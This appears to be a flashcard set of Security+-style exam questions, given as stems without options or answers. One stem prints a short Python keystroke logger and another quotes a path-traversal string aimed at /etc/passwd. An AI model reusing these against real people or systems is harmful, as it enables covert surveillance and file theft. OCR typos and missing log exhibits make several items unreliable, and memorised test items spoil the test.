Flashcard Info

Here you can learn everything about this flashcard

T.W.C701



Multiple choice cards
Normal cards
Cards total
Category
Language
From

60. An employee receives a text message from an unknown number claiming to be the company's Chief Executive Officer and asking the employee to purchase several gift cards.

Which of the following types of attacks does this describe?





212. Which ol the following is required in order or an IDS and a WAF to be effective on HTTPS traffic?





163. Which of the following involves an attempt to take advantage of database misconfigurations?





137. A company is discarding a classified storage array and hires an outside vendor to complete the disposal.

Which of the following should the company request from the vendor?





169. Which of the following is the most common data loss path for an air-gapped network?





57. A company is planning to set up a SIEM system and assign an analyst to review the logs on a weekly basis.

Which of the following types of controls is the company setting up?





295. Which Of the following security controls can be used to prevent multiple from using a unique card swipe and being admitted to a entrance?





14 A penetration tester begins an engagement by performing port and service scans against the client environment according to the rules of engagement.

Which of the following reconnaissance types is the tester performing?





239. Which of the following should be addressed first on security devices before connecting to the network?





30. Which of the following security control types does an acceptable use policy best represent?





165. Which of the following is used to quantitatively measure the criticality of a vulnerability?





195. A company owns a public-facing e-commerce website. The company outsources credit card transactions to a payment company.

Which of the following BEST describes the role of the payment company?





311. An organization has been experiencing outages during holiday sales and needs to ensure availability of its point-of-sales systems. The IT administrator has been asked to improve both server-data fault tolerance and site availability under high consumer load.

Which of the following are the best options to accomplish this objective? (Select two.)







302. Unauthorized devices have been detected on the internal network. The devices' locations were traced to Ether ports located in conference rooms.

Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?





27. Which of the following is a cryptographic concept that operates on a fixed length of bits?





173. A systems administrator wants to prevent users from being able to access data based on their responsibilities. The administrator also wants to apply the required access structure via a simplified format.

Which of the following should the administrator apply to the site recovery resource group?





270. An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced due to loss, damage, or theft steadily increased by 10%.

Which of the following would best describe the estimated number of devices to be replaced next year?





271. An engineer is using scripting to deploy a network in a cloud environment. Which the following describes this scenario?





145. A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices.

Which of the following vulnerabilities is the organization addressing?





328. Which of the following describes business units that purchase and implement scripting software without approval from an organization's technology Support staff?





34. Which of the following should a security administrator adhere to when setting up a new set of firewall rules?





109. A network manager wants to protect the company's VPN by implementing multifactor authentication that uses:
. Something you know
. Something you have
. Something you are


Which of the following would accomplish the manager's goal?





197. A company completed a vulnerability scan. The scan found malware on several systems that were running older versions of Windows.

Which of the following is MOST likely the cause of the malware infection?





168. Security controls in a data center are being reviewed to ensure data is properly protected and that human life considerations are included.

Which of the following best describes how the controls should be set up?





319. A Chief Information Security Officer (CISO) wants to implement a new solution that can protect against certain categories of websites, whether the employee is in the offer or away.

Which of the following solutions should the CISO implement?





186. An attacker replaces a digitally signed document with another version that goes unnoticed Upon reviewing the document's contents the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue.

Which of the following attacks was used?





266. A network administrator needs to determine the sequence of a server farm's logs.

Which of the following should the administrator consider? (Select two).







108. After a company was compromised, customers initiated a lawsuit. The company's attorneys have requested that the security team initiate a legal hold in response to the lawsuit.

Which of the following describes the action the security team will most likely be required to take?





230. A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system.

Which of the following deployment models is the company implementing?





255. A company recently upgraded its authentication infrastructure and now has more computing power.

Which of the following should the company consider using to ensure user credentials are being transmitted and stored more securely?





16. Which of the following is required for an organization to properly manage its restore process in the event of system failure?





307. A company was recently breached Pan of the company's new cybersecurity strategy is to centralized the togs horn all security devices.

Which of the following components forwards the logs to a central source?





82. A company hired a consultant to perform an offensive security assessment covering penetration testing and social engineering. Which of the following teams will conduct this assessment activity?





175. An organization discovered a disgruntled employee exfiltrated a large amount of PII data by uploading files Which of the following controls should the organization consider to mitigate this risk?





133. A security analyst locates a potentially malicious video file on a server and needs to identify both the creation date and the file's creator.

Which of the following actions would most likely give the security analyst the information required?





196. While troubleshooting a service disruption on a mission-critical server, a technician discovered the user account that was configured to run automated processes was disabled because the user's password failed to meet password complexity requirements.

Which of the following would be the BEST solution to securely prevent future issues?





129. Which of the following describes a security alerting and monitoring tool that collects system, application, and network logs from multiple sources in a centralized system?





17 Which of the following vulnerabilities is associated with installing software outside of a manufacturer's approved software repository?





72. Which of the following should a systems administrator use to ensure an easy deployment of resources within the cloud provider?

 





117. A healthcare organization wants to provide a web application that allows individuals to digitally report health emergencies.

Which of the following is the most important consideration during development?





298. An employee used a corporate mobile device during a vacation Multiple contacts were modified in the device vacation Which of the following method did attacker to insert the contacts without having 'Physical access to device?





204. A security administrator Installed a new web server. The administrator did this to Increase the capacity (or an application due to resource exhaustion on another server.

Which ( the following algorithms should the administrator use to split the number of the connections on each server In half?





198. A security administrator is seeking a solution to prevent unauthorized access to the internal network.

Which of the following security solutions should the administrator choose?





214. Which of Ihe following control types is patch management classified under?





310. A security analyst receives an alert that indicates a user's device is displaying anomalous behavior.
The analyst suspects the device might be compromised Which of the following should the analyst to first?





24. A company needs to provide administrative access to internal resources while minimizing the traffic allowed through the security boundary.

Which of the following methods is most secure?





282. A software developer used open-source libraries to streamline development.

Which of the following is the greatest risk when using this approach?





222. Which of the following procedures would be performed after the root cause of a security incident has been identified to help avoid future incidents from occurring?





265. A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process.

Which of the following is the most likely cause of the issue?





225. A retail store has a business requirement to deploy a kiosk computer In an open area The kiosk computer's operating system has been hardened and tested. A security engineer IS concerned that someone could use removable media to install a rootkit Mich of the should the security engineer configure to BEST protect the kiosk computer?





202. Given the following snippet of Python code: 

#!/usr/bin/env python3
import logging
from pynput.keyboard import Key, Listener
logging.basicconfig(filename-("output.txt"), level-logging.DEBUG. format-"
(asctime)s(message)s")
def on_press (key):
logging.info(str(key))
with Listener(on_press-on_press) as listener:
listener.join()


Which of the following types of malware MOST likely contains this snippet?





191. A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users' PCs.

Which of the following is the MOST likely cause of this issue?





160. A bank insists all of its vendors must prevent data loss on stolen laptops.

Which of the following strategies is the bank requiring?





120. An analyst is evaluating the implementation of Zero Trust principles within the data plane.

Which of the following would be most relevant for the analyst to evaluate?





279. A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the companVs mobile application. After reviewing the back-end server logs, the security analyst finds the following entries.

Which of the following is the most likely cause of the security control bypass?





74. A company's legal department drafted sensitive documents in a SaaS application and wants to ensure the documents cannot be accessed by individuals in high-risk countries.

Which of the following is the most effective way to limit this access?





300. Which of the following best describes when an organization Utilizes a read-to-use application from
a cloud provider?





208. Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation or a few days.

Which of the following attacks can the account lockout be attributed to?





70. During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, and two special characters. Once the password is created, the company will grant the employee access to other company-owned websites based on the intranet profile. Which of the following access
management concepts is the company most likely using to safeguard intranet accounts and grant access to multiple sites based on a user's intranet account? (Select two)







211. An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Select TWO).







87. An administrator was notified that a user logged in remotely after hours and copied large amounts
of data to a personal device.

Which of the following best describes the user's activity?





219. A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk.

Which of the following techniques should the team use to obtain a sample of the malware binary?





207. A security administrator Is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Select TWO).







69. An administrator is reviewing a single server's security logs and discovers the following;

Which of the following best describes the action captured in this log file?





5. A data administrator is configuring authentication for a SaaS application and would like to reduce the number of credentials employees need to maintain. The company prefers to use domain credentials to access new SaaS applications.

Which of the following methods would allow this functionality?





243. A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release.

Which of the following documents would the third-party vendor most likely be required to review and sign?





119. An attacker posing as the Chief Executive Officer calls an employee and instructs the employee to buy gift cards. Which of the following techniques is the attacker using?





250. A small, local company experienced a ransomware attack. The company has one web-facing server and a few workstations. Everything is behind an ISP firewall. A single web-facing server is set up on the router to forward all ports so that the server is viewable from the internet. The company uses an older version of third-party software to manage the website. The assets were never patched.

Which of the following should be done to prevent an attack like this from happening again? (Select three).









40. A technician wants to improve the situational and environmental awareness of existing users as they transition from remote to in-office work.

Which of the following is the best option?





105. Which of the following vulnerabilities is exploited when an attacker overwrites a register with a malicious address?





156. After a security awareness training session, a user called the IT help desk and reported a suspicious call. The suspicious caller stated that the Chief Financial Officer wanted credit card information in order to close an invoice.

Which of the following topics did the user recognize from the training?





132. An administrator assists the legal and compliance team with ensuring information about customer transactions is archived for the proper time period.

Which of the following data policies is the administrator carrying out?






296. A major manufacturing company updated its internal infrastructure and just started to allow OAuth application to access corporate data Data leakage is being reported.

Which of following most likely caused the issue?





43. Which of the following roles, according to the shared responsibility model, is responsible for securing the company's database in an IaaS model for a cloud environment?





56. Visitors to a secured facility are required to check in with a photo ID and enter the facility through an access control vestibule.

Which of the following but describes this form of security control?





171. An organization is struggling with scaling issues on its VPN concentrator and internet circuit due to remote work. The organization is looking for a software solution that will allow it to reduce traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data center and monitoring of remote employee internet traffic.

Which of the following will help achieve these objectives?





286. A candidate attempts to go to but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following best describes this type of attack?





313. A security analyst is reviewing computer logs because a host was compromised by malware After the computer was infected it displayed an error screen and shut down.

Which of the following should the analyst review first to determine more information?





81. Which of the following would be the best way to block unknown programs from executing?





260. A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS.

Which of the following is most likely preventing the IT manager at the hospital from upgrading the specialized OS?





326. A security engineer learns that a non-critical application was compromised. The most recent version of the application includes a malicious reverse proxy while the application is running.

Which of the following should the engineer is to quickly contain the incident with the least amount of impact?





252. A security administrator is compiling information from all devices on the local network in order to gain better visibility into user activities.

Which of the following is the best solution to meet this objective?





6. Which of the following scenarios describes a possible business email compromise attack?





284. A network engineer receives a call regarding multiple LAN-connected devices that are on the same switch. The devices have suddenly been experiencing speed and latency issues while connecting to network resources. The engineer enters the command show mac address-table and reviews the following output.

Which of the following best describes the attack that is currently in progress?





261. An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security policy, all web-server ports except 443 should be disabled.

Which of the following can be used to accomplish this task?





89. Which of the following is the best way to consistently determine on a daily basis whether security settings on servers have been modified?





206. A security administrator Is managing administrative access to sensitive systems with the following requirements:

-Common login accounts must not be used or administrative duties.

-Administrative accounts must be temporal in nature.

-Each administrative account must be assigned to one specific user.

-Accounts must have complex passwords.

-Audit trails and logging must be enabled on all systems.

Which of the following solutions should the administrator deploy to meet these requirements?





227. A company needs to enhance Its ability to maintain a scalable cloud Infrastructure. The Infrastructure needs to handle the unpredictable loads on the company's web application.

Which of the following cloud concepts would BEST these requirements?





86. A security practitioner completes a vulnerability assessment on a company's network and finds several vulnerabilities, which the operations team remediates.

Which of the following should be done next?





158. Which of the following is used to validate a certificate when it is presented to a user?





238. A company would like to move to the cloud. The company wants to prioritize control and security over cost and ease of management.

Which of the following cloud models would best suit this company's priorities?





146. Which of the following practices would be best to prevent an insider from introducing malicious code into a company's development process?





320. Which of the following is a security implication of newer ICS devices that are becoming more common in corporations?





210. Sales team members have been receiving threatening voicemail messages and have reported these incidents to the IT security team.

Which of the following would be MOST appropriate for the IT security team to analyze?





115. Which of the following methods to secure credit card data is best to use when a requirement is to see only the last four numbers on a credit card?





50. A company is working with a vendor to perform a penetration test Which of the following includes an estimate about the number of hours required to complete the engagement?





258. Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network.

Which of the following technologies would be best to correlate the activities between the different endpoints?





301. A company is moving its retail website to a public cloud provider. The company wants to tokenize audit card data but not allow the cloud provider to see the stored credit card information.

Which of the following would BEST meet these objectives?





213. A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes down.

Which of the following should the architect implement on the server to achieve this goal?





77. An organization is building a new backup data center with cost-benefit as the primary requirement and RTO and RPO values around two days. Which of the following types of sites is the best for this scenario?





251. A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities?





205. A large bank with two geographically dispersed data centers Is concerned about major power disruptions at Both locations. Every day each location experiences very brief outages thai last (or a few seconds. However, during the summer a high risk of intentional under-voltage events that could last up to an hour exists, particularly at one of the locations near an industrial smelter.

Which of the following is the BEST solution to reduce the risk of data loss?





180. A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks Which of the following should the administrator consider?





322. A security administrator needs to provide secure access to internal networks for external partners. The administrator has given the PSK and other parameters to the third-party security administrator.

Which of the following is being used to establish this connection?





83. A software development manager wants to ensure the authenticity of the code created by the company.

Which of the following options is the most appropriate?





237. A cybersecurity analyst needs to adopt controls to properly track and log user actions to an individual. Which of the following should the analyst implement?





90. Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer's PII?





242. Which of the following can be used to calculate the total loss expected per year due to a threat targeting an asset?





246. A security analyst reviews web server logs and finds the following string gallery: file--. ./../../../../. ./ . ./etc/passwd

Which of the following attacks was performed against the web server?





15. Which of the following is required for an organization to properly manage its restore process in the event of system failure?





241. Which of the following is a solution that can be used to stop a disgruntled employee from copying confidential data to a USB drive?





12 A company is required to use certified hardware when building networks.

Which of the following best addresses the risks associated with procuring counterfeit hardware?





294. A company a "right to forgotten" request To legally comply, the company must remove data related to the requester from its systems. Which Of the following Company most likely complying with?





118. An organization wants a third-party vendor to do a penetration test that targets a specific device. The organization has provided basic information about the device.

Which of the following best describes this kind of penetration test?





254. A financial institution recently joined a bug bounty program to identify security issues in the institution's new public platform.

Which of the following best describes who the institution is working with to identify security issues?





92. A security analyst and the management team are reviewing the organizational performance of a recent phishing campaign. The user click-through rate exceeded the acceptable risk threshold, and the management team wants to reduce the impact when a user clicks on a link in a phishing message.

Which of the following should the analyst do?





39. A company has begun labeling all laptops with asset inventory stickers and associating them with employee IDs.

Which of the following security benefits do these actions provide? (Choose two.)







297. A security administrator needs to block a TCP connection using the corporate firewall, Because this connection is potentially a threat. the administrator not want to back an RST.

Which of the following actions in rule would work best?





232. An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed.

Which of the following is the MOST likely cause for the high number of findings?





287. A police department is using the cloud to share information city officials.

Which of the cloud models describes this scenario?





178. An employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm employee's identity before sending him the prize.

Which of the following BEST describes 





229. A corporate security team needs to secure the wireless perimeter of its physical facilities to ensure only authorized users can access corporate resources.

Which of the following should the security team do?





289. Which of the following security design features can an development team to analyze the deletion eoting Of data sets the copy?





262. A security operations center wants to implement a solution that can execute files to test for malicious activity. The solution should provide a report of the files' activity against known threats.

Which of the following should the security operations center implement?





128. A security administrator is deploying a DLP solution to prevent the exfiltration of sensitive
customer data. Which of the following should the administrator do first?





99. A company is concerned about weather events causing damage to the server room and downtime.

Which of the following should the company consider?





41. A newly appointed board member with cybersecurity knowledge wants the board of directors to receive a quarterly report detailing the number of incidents that impacted the organization. The systems administrator is creating a way to present the data to the board of directors.

Which of the following should the systems administrator use?





123. An enterprise is trying to limit outbound DNS traffic originating from its internal network. Outbound DNS requests will only be allowed from one device with the IP address 10.50.10.25.

Which of the following firewall ACLs will accomplish this goal?





9 An administrator notices that several users are logging in from suspicious IP addresses. After speaking with the users, the administrator determines that the employees were not logging in from those IP addresses and resets the affected users passwords.

Which of the following should the administrator implement to prevent this type of attack from succeeding in the future?





61. A security analyst receives alerts about an internal system sending a large amount of unusual DNS queries to systems on the internet over short periods of time during non-business hours.

Which of the following is most likely occurring?





216 The findings in a consultant's report indicate the most critical risk to the security posture from an incident response perspective is a lack of workstation and server investigation capabilities.

Which of the following should be implemented to remediate this risk?





98. A security analyst reviews domain activity logs and notices the following:

Which of the following is the best explanation for what the security analyst has discovered?

 

 





131. After a recent vulnerability scan, a security engineer needs to harden the routers within the corporate network.

Which of the following is the most appropriate to disable?





324. An attacker is using a method to hide data inside of benign files in order to exfiltrate confidential data.

Which of the following is the attacker most likely using?





314. A data cento has experienced an increase in under-voltage events Mowing electrical grid maintenance outside the facility. These events are leading to occasional losses of system availability.

Which of the following would be the most cost-effective solution for the data center 10 implement





283. An organization wants to quickly assess how effectively the IT team hardened new laptops.

Which of the following would be the best solution to perform this assessment?





308. Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges?





53. Which of the following incident response activities ensures evidence is properly handied?





3. An employee clicked a link in an email from a payment website that asked the employee to update contact information. The employee entered the log-in information but received a page not found error message.

Which of the following types of social engineering attacks occurred?





100. Which of the following is a primary security concern for a company setting up a BYOD program?





203. A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure.

Which of the following should the architect choose?





58. A systems administrator is changing the password policy within an enterprise environment and wants this update implemented on all systems as quickly as possible.

Which of the following operating system security measures will the administrator most likely use?





19. An analyst is evaluating the implementation of Zero Trust principles within the data plane.

Which of the following would be most relevant for the analyst to evaluate?





125. Which of the following factors are the most important to address when formulating a training curriculum plan for a security awareness program? (Select two).







107. Which of the following describes the process of concealing code or text inside a graphical image?





290. A security analyst is reviewing packet capture data from a compromised host On the In the packet capture. analyst locates packets that contain large of text.

Which Of following is most likely installed on compromised host?





217. The management team has requested that the security team implement 802.1X into the existing
wireless network setup. The following requirements must be met:

-Minimal interruption to the end user
-Mutual certificate validation
Which of the following authentication protocols would meet these requirements?





321. A security investigation revealed mat malicious software was installed on a server using a server administrator credentials. During the investigation the server administrator explained that Telnet was regularly used to log in.

Which of the blowing most likely occurred?





47. A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?





179. An organization wants to enable built-in FDE on all laptops.

Which of the following should the organization ensure is Installed on all laptops?





102. Which of the following is the most likely to be included as an element of communication in a security awareness program?





192. Which of the following should customers who are involved with Ul developer agreements be concerned with when considering the use of these products on highly sensitive projects?





161. Which of the following would be best suited for constantly changing environments?





228. A user is trying to upload a tax document, which the corporate finance department requested, but a security program IS prohibiting the upload A security analyst determines the file contains Pll. 

Which of the following steps can the analyst take to correct this issue?





249. A company is enhancing the security of the wireless network and needs to ensure only employees with a valid certificate can authenticate to the network.

Which of the following should the company implement?





187. An employee's company account was used in a data breach Interviews with the employee revealed:

-The employee was able to avoid changing passwords by using a previous password again.

-The account was accessed from a hostile, foreign nation, but the employee has never traveled to any
other countries.

Which of the following can be implemented to prevent these issues from reoccuring? (Select TWO)







248. Which of the following can reduce vulnerabilities by avoiding code reuse?





76. While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician updates the policy, but the new policy causes several company servers to become unreachable.

Which of the following actions would prevent this issue?





55. A company must ensure sensitive data at rest is rendered unreadable.

Which of the following will the company most likely use?





240. A desktop computer was recently stolen from a desk located in the lobby of an office building.

Which of the following would be the best way to secure a replacement computer and deter future theft?





127. Which of the following is the best reason to complete an audit in a banking environment?





148. After an audit, an administrator discovers all users have access to confidential data on a file server.

Which of the following should the administrator use to restrict access to the data quickly?





157. Which of the following exercises should an organization use to improve its incident response process?





75. Which of the following is a hardware-specific vulnerability?





114. Which of the following must be considered when designing a high-availability network? Choose two







36. Which of the following threat actors is the most likely to use large financial resources to attack critical systems located in other countries?





263. A company has hired an assessment team to test the security of the corporate network and employee vigilance. Only the Chief Executive Officer and Chief Operating Officer are aware of this exercise, and very little information has been provided to the assessors.

Which of the following is taking place?





299. A systems analyst is responsible for generating a new digital forensics chain -of- custody form

Which of the following should the analyst include in this documentation? (Select two).







194. Which of the following Is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?





79. A systems administrator works for a local hospital and needs to ensure patient data is protected and secure.

Which of the following data classifications should be used to secure patient data?





291. An employee's laptop was stolen last month. This morning, the was returned by the A cyberrsecurity analyst retrieved laptop and has since cybersecurity incident checklist Four incident handlers are responsible for executing the checklist.

Which of the following best describes the process for evidence collection assurance?





121. An organization is leveraging a VPN between its headquarters and a branch location.

Which of the following is the VPN protecting?





25. A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic coming from an employee's corporate laptop. The security analyst has determined that additional data about the executable running on the machine is necessary to continue the investigation.

Which of the following logs should the analyst use as a data source?





149. A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team.

Which of the following best describes the threat actor in the CISO's report?





199. A company is concerned about individuals driving a car into the building to gain access.

Which of the following security controls would work BEST to prevent this from happening?






42. A systems administrator receives the following alert from a file integrity monitoring tool:
The hash of the cmd.exe file has changed. The systems administrator checks the OS logs and notices that no patches were applied in the last two months.

Which of the following most likely occurred?





141. After a recent ransomware attack on a company's system, an administrator reviewed the log files.

Which of the following control types did the administrator use?





166. A technician is opening ports on a firewall for a new system being deployed and supported by a SaaS provider.

Which of the following is a risk in the new system?





154. Which of the following best practices gives administrators a set period to perform changes to an operational system to ensure availability and minimize business impacts?





170. Which of the following can best protect against an employee inadvertently installing malware on a company system?





309. Stakeholders at an organisation must be kept aware of any incidents and receive updates on status changes as they occur.

Which of the following Plans would fulfill this requirement?





193. Which of the following would satisfy three-factor authentication requirements?





85. During an investigation, an incident response team attempts to understand the source of an incident.

Which of the following incident response activities describes this process?





164. An organization would like to store customer data on a separate part of the network that is not accessible to users on the main corporate network.

Which of the following should the administrator use to accomplish this goal?





226. An upcoming project focuses on secure communications and trust between external parties.

Which of the following security components will need to be considered to ensure a chosen trust provider IS used and the selected option is highly scalable?





209. A security architect is designing the new outbound internet for a small company. The company would like all 50 users to share the same single Internet connection. In addition, users will not be permitted to use social media sites or external email services while at work.

Which of the following should be included in this design to satisfy these requirements? (Select TWO).







59. Which of the following would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclosed?





201. A network administrator needs to determine Ihe sequence of a server farm's logs.

Which of the following should the administrator consider? (Select TWO).







181. Which of the following biometric authentication methods is the MOST accurate?





200. A security team will be outsourcing several key functions to a third party and will require that:

-Several of the functions will carry an audit burden.

-Attestations will be performed several times a year.

-Reports will be generated on a monthly basis.

Which of the following BEST describes the document that is used to define these requirements and stipulate how and when they are performed by the third party?





220. A security administrator is managing administrative access to sensitive systems with the following requirements:

-Common login accounts must not be used for administrative duties.

-Administrative accounts must be temporal in nature.

-Each administrative account must be assigned to one specific user.

-Accounts must have complex passwords. " Audit trails and logging must be enabled on all systems.

Which of the following solutions should the administrator deploy to meet these requirements





256. Which of the following social engineering attacks best describes an email that is primarily intended to mislead recipients into forwarding the email to others?





264. A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies would most likely contain language that would prohibit this activity?





288. Which of the following allow access to remote computing resources, a operating system. and
centrdized configuration and data.





293. Which Of the following control types is patch management classified under?





325. An email security vendor recently added a retroactive alert after discovering a phishing email had already been delivered to an inbox.

Which of the following would be the best way for the security administrator to address this type of alert in the future?





101. A company decided to reduce the cost of its annual cyber insurance policy by removing the coverage for ransomware attacks.

Which of the following analysis elements did the company most likely use in making this decision?





135. A security administrator needs a method to secure data in an environment that includes some form of checks so that the administrator can track any changes.

Which of the following should the administrator set up to achieve this goal?





162. A security analyst scans a company's public network and discovers a host is running a remote desktop that can be used to access the production network.

Which of the following changes should the security analyst recommend?





65. Which of the following is used to protect a computer from viruses, malware, and Trojans being installed and moving laterally across the network?





31. An IT manager informs the entire help desk staff that only the IT manager and the help desk lead will have access to the administrator console of the help desk software.

Which of the following security techniques is the IT manager setting up?





247. A security administrator is integrating several segments onto a single network. One of the segments, which includes legacy devices, presents a significant amount of risk to the network.

Which of the following would allow users to access to the legacy devices without compromising the security of the entire network?






327. Which of the following models offers third-party-hosted, on-demand computing resources that can be shared with multiple organizations over the internet?





218. Which of the following describes where an attacker can purchase DDoS or ransomware services?





155. Which of the following actions could a security engineer take to ensure workstations and servers are properly monitored for unauthorized changes and software?





126. An organization disabled unneeded services and placed a firewall in front of a business-critical legacy system.

Which of the following best describes the actions taken by the organization?





21. A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen.Which of the following would BEST meet these requirements? (Select TWO).







312. Which of the following would provide guidelines on how to label new network devices as part of the
initial configuration?





276. Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices.

Which of the following tools should the security analyst use to help identify if the traffic is being blocked?





51. Which of the following teams combines both offensive and defensive testing techniques to protect
an organization's critical systems?





151. A company is developing a critical system for the government and storing project information on a fileshare.

Which of the following describes how this data will most likely be classified? (Select two).







78. A company requires hard drives to be securely wiped before sending decommissioned systems to recycling. Which of the following best describes this policy?





150. A small business uses kiosks on the sales floor to display product information for customers. A security team discovers the kiosks use end-of-life operating systems.

Which of the following is the security team most likely to document as a security implication of the current architecture?





235. A security engineer is concerned the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer wants a tool that can monitor for changes to key files and network traffic for the device.

Which of the following tools should the engineer select?





188. A company is concerned about individuals dnvmg a car into the building to gam access.

Which of the following security controls would work BEST to prevent this from happening?






234. A web server log contains two million lines. A security analyst wants to obtain the next 500 lines starting from line 4,600. Which of the following commands will help the security analyst to achieve this objective?





113. Which of the following automation use cases would best enhance the security posture of an organization by rapidly updating permissions when employees 





233. A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets available?





185. A company would like to set up a secure way to transfer data between users via their mobile phones The company's top pnonty is utilizing technology that requires users to be in as close proximity as possible to each other.

Which of the following connection methods would BEST fulfill this need?





329. A security operations technician is searching the log named /vax/messages for any events that were associated with a workstation with the IP address 10.1.1.1.

Which of the following would provide this information?





45. A security team is reviewing the findings in a report that was delivered after a third party performed a penetration test. One of the findings indicated that a web application form field is vulnerable to cross-site scripting. Which of the following application security techniques should the security analyst recommend the developer implement to prevent this vulnerability?





37. Which of the following enables the use of an input field to run commands that can view or manipulate data?





71. An enterprise has been experiencing attacks focused on exploiting vulnerabilities in older browser versions with well-known exploits.

Which of the following security solutions should be configured to best provide the ability to monitor and block these known signature-based attacks?





317. A cybersecurity analyst at Company A is working to establish a secure communication channel with a counter part at Company B, which is 3,000 miles (4.828 kilometers) away.

Which of the following concepts would help the analyst meet this goal m a secure manner?





54. Which of the following describes the maximum allowance of accepted risk?





10 An employee receives a text message that appears to have been sent by the payroll department and is asking for credential verification.

Which of the following social engineering techniques are being attempted? (Choose two.)







143. A Chief Information Security Officer wants to monitor the company's servers for SQLi attacks and allow for comprehensive investigations if an attack occurs. The company uses SSL decryption to allow traffic monitoring.

Which of the following strategies would best accomplish this goal?





268. A security administrator suspects there may be unnecessary services running on a server.

Which of the following tools will the administrator most likely use to confirm the suspicions?





8 An organization?s internet-facing website was compromised when an attacker exploited a buffer overflow.

Which of the following should the organization deploy to best protect against similar attacks in the future?





330. A company was recently breached. Part of the company's new cybersecurity strategy is to centralize the logs from all security devices.

Which of the following components forwards the logs to a central source?





66. A user is attempting to patch a critical system, but the patch fails to transfer. Which of the following access controls is most likely inhibiting the transfer?





152. After reviewing the following vulnerability scanning report:
Server:192.168.14.6
Service: Telnet
Port: 23 Protocol: TCP
Status: Open Severity: High
Vulnerability: Use of an insecure network protocol
A security analyst performs the following test:
nmap -p 23 192.168.14.6 ?script telnet-encryption
PORT STATE SERVICE REASON
23/tcp open telnet syn-ack
I telnet encryption:
| _ Telnet server supports encryption


Which of the following would the security analyst conclude for this reported vulnerability? 





48. Which of the following describes the reason root cause analysis should be conducted as part of
incident response?





44. A client asked a security company to provide a document outlining the project, the cost, and the completion time frame. Which of the following documents should the company provide to the client?





96. A systems administrator is looking for a low-cost application-hosting solution that is cloud-based.

Which of the following meets these requirements?





73. A company is developing a business continuity strategy and needs to determine how many staff members would be required to sustain the business in the case of a disruption.

Which of the following best describes this step?





11. Several employees received a fraudulent text message from someone claiming to be the Chief
Executive Officer (CEO). The message stated: I m in an airport right now with no access to email. I need you to buy gift cards for employee recognition awards. Please send the gift cards to following email address.

Which of the following are the best responses to this situation? (Choose two).







304. A systems engineer thinks a business system has been compromised and is being used to exfiltrated data to a competitor The engineer contacts the CSIRT The CSIRT tells the engineer to immediately disconnect the network cable and to not do anything else.

Which of the following is the most likely reason for this request?





26. A cyber operations team informs a security analyst about a new tactic malicious actors are using to
compromise networks. SIEM alerts have not yet been configured.

Which of the following best describes what the security analyst should do to identify this behavior?





33. The local administrator account for a company's VPN appliance was unexpectedly used to log in to the remote management interface.

Which of the following would have most likely prevented this from happening'?





142. Which of the following agreement types defines the time frame in which a vendor needs to respond?





147. A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of end users.

Which of the following would be a good use case for this task?





189. A security analyst is using OSINT to gather information to verify whether company data is available publicly.

Which of the following is the BEST application for the analyst to use?





106. Which of the following would be the best way to handle a critical business application that is running on a legacy server?





93. Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?





144. A client demands at least 99.99% uptime from a service provider's hosted security services.

Which of the following documents includes the information the service provider should return to the client?





236. Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?





153. A security consultant needs secure, remote access to a client environment.

Which of the following should the security consultant most likely use to gain access?





49. Which of the following is the most likely outcome if a large bank fails an internal PCI DSS compliance assessment?





305. Which of the following secure application development concepts aims to block verbose error messages from being shown in a user's interface?





